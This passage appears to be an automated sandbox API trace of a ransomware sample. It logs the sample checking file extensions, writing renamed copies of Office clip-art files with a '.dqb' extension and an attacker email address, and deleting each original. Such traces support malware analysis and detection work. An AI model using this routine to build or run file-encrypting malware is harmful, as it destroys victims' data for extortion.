Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0050.481] lstrlenW (lpString=".jpg") returned 4 [0050.481] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.482] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.482] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0050.482] GetLastError () returned 0x0 [0050.482] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x2e73, lpOverlapped=0x0) returned 1 [0050.484] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x2e80, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x2e80, lpOverlapped=0x0) returned 1 [0050.485] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.485] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.485] SetEndOfFile (hFile=0x184) returned 1 [0050.485] CloseHandle (hObject=0x184) returned 1 [0050.485] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.485] SetEndOfFile (hFile=0x214) returned 1 [0050.486] CloseHandle (hObject=0x214) returned 1 [0050.486] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.486] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif")) returned 1 [0050.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0050.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0050.486] lstrlenW (lpString=".doc") returned 4 [0050.486] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.487] lstrlenW (lpString=".docx") returned 5 [0050.487] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.487] lstrlenW (lpString=".pdf") returned 4 [0050.487] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.487] lstrlenW (lpString=".xls") returned 4 [0050.487] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.487] lstrlenW (lpString=".xlsx") returned 5 [0050.487] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.487] lstrlenW (lpString=".ppt") returned 4 [0050.487] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0050.487] lstrlenW (lpString=".zip") returned 4 [0050.487] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.487] lstrlenW (lpString=".rar") returned 4 [0050.487] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.487] lstrlenW (lpString=".bz2") returned 4 [0050.487] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.487] lstrlenW (lpString=".7z") returned 3 [0050.487] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0050.487] lstrlenW (lpString=".dbf") returned 4 [0050.487] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0050.487] lstrlenW (lpString=".1cd") returned 4 [0050.487] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0050.487] lstrlenW (lpString=".jpg") returned 4 [0050.487] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.488] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.488] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.488] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0050.488] GetLastError () returned 0x0 [0050.488] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x205, lpOverlapped=0x0) returned 1 [0050.489] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x210, lpOverlapped=0x0) returned 1 [0050.490] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.490] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.490] SetEndOfFile (hFile=0x184) returned 1 [0050.490] CloseHandle (hObject=0x184) returned 1 [0050.490] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.490] SetEndOfFile (hFile=0x214) returned 1 [0050.491] CloseHandle (hObject=0x214) returned 1 [0050.491] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.491] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif")) returned 1 [0050.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0050.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0050.491] lstrlenW (lpString=".doc") returned 4 [0050.492] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.492] lstrlenW (lpString=".docx") returned 5 [0050.492] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.492] lstrlenW (lpString=".pdf") returned 4 [0050.492] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.492] lstrlenW (lpString=".xls") returned 4 [0050.492] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.492] lstrlenW (lpString=".xlsx") returned 5 [0050.492] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.492] lstrlenW (lpString=".ppt") returned 4 [0050.492] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0050.492] lstrlenW (lpString=".zip") returned 4 [0050.492] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.492] lstrlenW (lpString=".rar") returned 4 [0050.492] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.492] lstrlenW (lpString=".bz2") returned 4 [0050.492] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.492] lstrlenW (lpString=".7z") returned 3 [0050.492] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0050.492] lstrlenW (lpString=".dbf") returned 4 [0050.492] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0050.492] lstrlenW (lpString=".1cd") returned 4 [0050.492] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0050.492] lstrlenW (lpString=".jpg") returned 4 [0050.492] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.493] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.493] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.493] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0050.493] GetLastError () returned 0x0 [0050.493] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x1f6, lpOverlapped=0x0) returned 1 [0050.495] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x200, lpOverlapped=0x0) returned 1 [0050.496] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.496] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.496] SetEndOfFile (hFile=0x184) returned 1 [0050.497] CloseHandle (hObject=0x184) returned 1 [0050.497] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.497] SetEndOfFile (hFile=0x214) returned 1 [0050.497] CloseHandle (hObject=0x214) returned 1 [0050.498] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.498] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif")) returned 1 [0050.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0050.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0050.498] lstrlenW (lpString=".doc") returned 4 [0050.498] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.498] lstrlenW (lpString=".docx") returned 5 [0050.498] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.498] lstrlenW (lpString=".pdf") returned 4 [0050.498] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.498] lstrlenW (lpString=".xls") returned 4 [0050.498] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.498] lstrlenW (lpString=".xlsx") returned 5 [0050.498] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.498] lstrlenW (lpString=".ppt") returned 4 [0050.498] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0050.498] lstrlenW (lpString=".zip") returned 4 [0050.498] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.498] lstrlenW (lpString=".rar") returned 4 [0050.498] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.498] lstrlenW (lpString=".bz2") returned 4 [0050.499] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.499] lstrlenW (lpString=".7z") returned 3 [0050.499] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0050.499] lstrlenW (lpString=".dbf") returned 4 [0050.499] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0050.499] lstrlenW (lpString=".1cd") returned 4 [0050.499] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0050.499] lstrlenW (lpString=".jpg") returned 4 [0050.499] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.500] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.500] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.500] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0050.500] GetLastError () returned 0x0 [0050.500] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x319e, lpOverlapped=0x0) returned 1 [0050.937] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x31a0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x31a0, lpOverlapped=0x0) returned 1 [0050.938] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.938] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.938] SetEndOfFile (hFile=0x184) returned 1 [0050.938] CloseHandle (hObject=0x184) returned 1 [0050.938] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.938] SetEndOfFile (hFile=0x214) returned 1 [0050.939] CloseHandle (hObject=0x214) returned 1 [0050.939] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.939] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif")) returned 1 [0050.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 [0050.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 [0050.940] lstrlenW (lpString=".doc") returned 4 [0050.940] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.940] lstrlenW (lpString=".docx") returned 5 [0050.940] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.940] lstrlenW (lpString=".pdf") returned 4 [0050.940] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.940] lstrlenW (lpString=".xls") returned 4 [0050.940] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.940] lstrlenW (lpString=".xlsx") returned 5 [0050.940] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.940] lstrlenW (lpString=".ppt") returned 4 [0050.940] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 [0050.940] lstrlenW (lpString=".zip") returned 4 [0050.940] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.940] lstrlenW (lpString=".rar") returned 4 [0050.940] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.940] lstrlenW (lpString=".bz2") returned 4 [0050.940] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.940] lstrlenW (lpString=".7z") returned 3 [0050.940] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 [0050.940] lstrlenW (lpString=".dbf") returned 4 [0050.940] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 [0050.940] lstrlenW (lpString=".1cd") returned 4 [0050.940] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 [0050.940] lstrlenW (lpString=".jpg") returned 4 [0050.940] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.941] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.941] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.941] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0050.941] GetLastError () returned 0x0 [0050.941] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x14ff, lpOverlapped=0x0) returned 1 [0050.943] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x1500, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x1500, lpOverlapped=0x0) returned 1 [0050.944] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.944] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.944] SetEndOfFile (hFile=0x184) returned 1 [0050.944] CloseHandle (hObject=0x184) returned 1 [0050.944] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.944] SetEndOfFile (hFile=0x214) returned 1 [0050.945] CloseHandle (hObject=0x214) returned 1 [0050.945] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.945] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif")) returned 1 [0050.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0050.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0050.946] lstrlenW (lpString=".doc") returned 4 [0050.946] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.946] lstrlenW (lpString=".docx") returned 5 [0050.946] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.946] lstrlenW (lpString=".pdf") returned 4 [0050.946] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.946] lstrlenW (lpString=".xls") returned 4 [0050.946] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.946] lstrlenW (lpString=".xlsx") returned 5 [0050.946] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.946] lstrlenW (lpString=".ppt") returned 4 [0050.946] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0050.946] lstrlenW (lpString=".zip") returned 4 [0050.946] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.946] lstrlenW (lpString=".rar") returned 4 [0050.946] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.946] lstrlenW (lpString=".bz2") returned 4 [0050.946] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.946] lstrlenW (lpString=".7z") returned 3 [0050.946] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0050.946] lstrlenW (lpString=".dbf") returned 4 [0050.946] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0050.946] lstrlenW (lpString=".1cd") returned 4 [0050.946] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0050.946] lstrlenW (lpString=".jpg") returned 4 [0050.946] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.947] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.947] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.947] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0050.947] GetLastError () returned 0x0 [0050.947] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x2420, lpOverlapped=0x0) returned 1 [0050.949] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x2430, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x2430, lpOverlapped=0x0) returned 1 [0050.950] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.950] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.950] SetEndOfFile (hFile=0x184) returned 1 [0050.950] CloseHandle (hObject=0x184) returned 1 [0050.950] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.950] SetEndOfFile (hFile=0x214) returned 1 [0050.951] CloseHandle (hObject=0x214) returned 1 [0050.951] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 